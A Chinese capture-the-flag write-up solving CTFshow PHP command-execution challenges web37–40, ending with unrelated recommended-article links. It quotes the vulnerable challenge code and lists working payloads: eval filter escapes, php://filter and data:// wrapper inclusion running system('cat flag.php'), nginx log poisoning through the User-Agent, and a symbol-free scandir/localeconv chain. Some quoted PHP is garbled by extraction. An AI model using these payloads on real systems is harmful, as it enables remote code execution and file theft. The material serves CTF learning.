CTFshow web(php命令执行 37-40)

?c=eval($_GETshy);&shy=passthru('cat flag.php'); #逃逸过滤

?c=include%09$_GETshy?>&shy=php://filter/read=convert.base64-encode/resource=flag.php #文件包含

?c=include%0a_GET\[cmd\]?\>\&cmd=php://filter/read=convert.base64-encode/resource=flag.php #文件包含 ?c=include_GETcmd?>&cmd=data://text/plan,<?php system("tac flag.php")?> #文件包含
?c=include$_GETcmd>&cmd=data://text/plan;base64;PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg== #文件包含

?c=data:text/plain; <?php system($_POST1);?> POST: 1=tac flag.php #伪协议

?c=/var/log/nginx/access.log 在 User-Agent插入<?php echo system('ls');?> #文件日志包含

?c=echo(`tac%09f*`); #反引号

这里是刷题篇,以上命令的原理来自

一篇文章带你进阶CTF命令执行-CSDN博客

可以先磨下刀,刷题更稳

这里的payload:

复制代码
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

include典型的文件包含,正好我之前写过类似的文章

文件包含提升-CSDN博客

直接照搬上去就好,这里不用phpinfo了,里面没有flag,直接换用<?php system('cat flag.php')?>

就好了,详细文件包含知识和原理在上面的文章

web38

<?php

/*

-*- coding: utf-8 -*-

@Author: h1xa

@Date: 2020-09-04 00:12:34

@Last Modified by: h1xa

@Last Modified time: 2020-09-04 05:23:36

@email: h1xa@ctfer.com

@link: https://ctfer.com

*/

//flag in flag.php

error_reporting(0);

if(isset($_GET'c')){

c = _GET'c';

if(!preg_match("/flag|php|file/i", $c)){

include($c);

echo $flag;

}

}else{

highlight_file(FILE);

}

还是直接data伪协议读取就好了,这里没有禁用这个,那就

复制代码
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

web39

<?php

/*

-*- coding: utf-8 -*-

@Author: h1xa

@Date: 2020-09-04 00:12:34

@Last Modified by: h1xa

@Last Modified time: 2020-09-04 06:13:21

@email: h1xa@ctfer.com

@link: https://ctfer.com

*/

//flag in flag.php

error_reporting(0);

if(isset($_GET'c')){

c = _GET'c';

if(!preg_match("/flag/i", $c)){

include($c.".php");

}

}else{

highlight_file(FILE);

}

还想啥,直接丢命令上去

这里证明还是可以执行这个为协议读取phpinfo的,直接CTRL+f全局查找ctfshow这几个关键字,发现没有flag,不过没事,换个命令就好了

<?=system("tac fla*.php");?>

这里别让对面匹配到php,直接用星号或者?替换就好

web40

<?php

/*

-*- coding: utf-8 -*-

@Author: h1xa

@Date: 2020-09-04 00:12:34

@Last Modified by: h1xa

@Last Modified time: 2020-09-04 06:03:36

@email: h1xa@ctfer.com

@link: https://ctfer.com

*/

if(isset($_GET'c')){

c = _GET'c';

if(!preg_match("/0-9|\~|\`|\@|\#|\\\|\\%\|\\\^\|\\\&\|\\\*\|\\(\|\\)\|\\-\|\\=\|\\+\|\\{\|\\\[\|\\\]\|\\}\|\\:\|\\'\|\\"\|\\,\|\\\<\|\\.\|\\\>\|\\/\|\\?\|\\\\\\\\/i", c)){

eval($c);

}

}else{

highlight_file(FILE);

}

到这里把特殊符号和数字基本都过滤了,有点狠了,之前的命令没有用,现在该凭借能力审计代码了。'

这里直接引用师傅的解释:

yu22x

先把payload写下 highlight_file(next(array_reverse(scandir(pos(localeconv())))));

需要用到的函数

localeconv():返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)

pos():返回数组中的当前元素的值。

array_reverse():数组逆序

scandir():获取目录下的文件

next(): 函数将内部指针指向数组中的下一个元素,并输出。

首先通过 pos(localeconv())得到点号,因为scandir('.')表示得到当前目录下的文件,所以

scandir(pos(localeconv()))就能得到flag.php了。具体内容如下

真心希望文章能够帮助大家学习,谢谢!

相关推荐
TrisighT20 分钟前
Electron 鸿蒙 PC 上点外链唤醒应用,我试了 6 种写法只有 1 种能跑
前端·electron·harmonyos
杉氧1 小时前
兼容与共生:如何在旧项目中优雅地引入 Compose?
android·架构·android jetpack
天才熊猫君1 小时前
配置与数据分离:一种可视化搭建的属性编辑方案
前端·javascript
林希_Rachel_傻希希1 小时前
web性能之相关路径——AI总结
前端·javascript·面试
竹林8182 小时前
用 wagmi v2 踩坑两天,我终于搞懂了多链钱包切换在 DeFi 前端中的正确姿势
前端·javascript
用户2136610035722 小时前
Vue项目搜索功能与面包屑导航
前端·javascript
Flynt2 小时前
Room 3.0 包名重构 + KMP 迁移:我把项目升级踩了个遍
android·数据库·kotlin
星栈2 小时前
LiveView 的实时通信,爽是爽,但 PubSub 和广播也最容易把自己绕晕
前端·前端框架·elixir
用户2930750976692 小时前
告别关键词匹配,拥抱向量语义 —— RAG 搜索从零到一
前端
独孤留白2 小时前
从C到Rust:告别 C 的"指针 + 长度"手动模式
前端·rust